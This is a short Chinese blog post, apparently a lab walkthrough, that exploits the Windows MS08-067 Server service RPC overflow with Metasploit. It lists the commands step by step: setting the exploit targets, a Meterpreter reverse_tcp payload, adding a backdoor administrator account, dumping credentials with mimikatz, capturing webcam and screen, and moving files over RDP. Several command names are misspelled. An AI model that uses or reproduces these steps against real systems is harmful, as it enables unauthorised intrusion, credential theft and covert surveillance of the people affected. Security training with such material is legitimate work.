标签:服务 snap alt 摄像头 list arch ip地址 加载 search
ipconfig
、ifconfig
确认攻击机和靶机在同一网段msfconsole
启用msf。search ms08-067
。set lhost ip地址
set lport 端口号
set rhost ip地址
set payload windows/meterpreter/reverse_tcp
。exploit/run
5.获得靶机权限。
gituid
net 用户名 密码 /add
net localgroup administrators 用户名 /add
rdesktop IP
idletime
meterpreter> load mimikatz
meterpreter> msv
meterpreter> wdigest
wencam_list
wencam_snap
wencam_stream
download path/filenam path
upload path/filename path/filename
rdesktop 靶机ip
# load espia
# screenshot
Microsoft Windows Server服务RPC请求缓冲区溢出漏洞
Windows的Server服务在处理特质RPC请求时存在缓冲区溢出漏洞,远程攻击者可以通过发送恶意的RPC请求触发这个溢出,导致完全入侵用户系统,SYSTEM权限执行任意指令。
对于Windows 2000、XP和Server 2003,无需认证便可以利用该漏洞;
对于Windows Vista和Server 2008,可能需要认证。
标签:服务 snap alt 摄像头 list arch ip地址 加载 search
原文地址:https://www.cnblogs.com/Mrwuhuai/p/12162753.html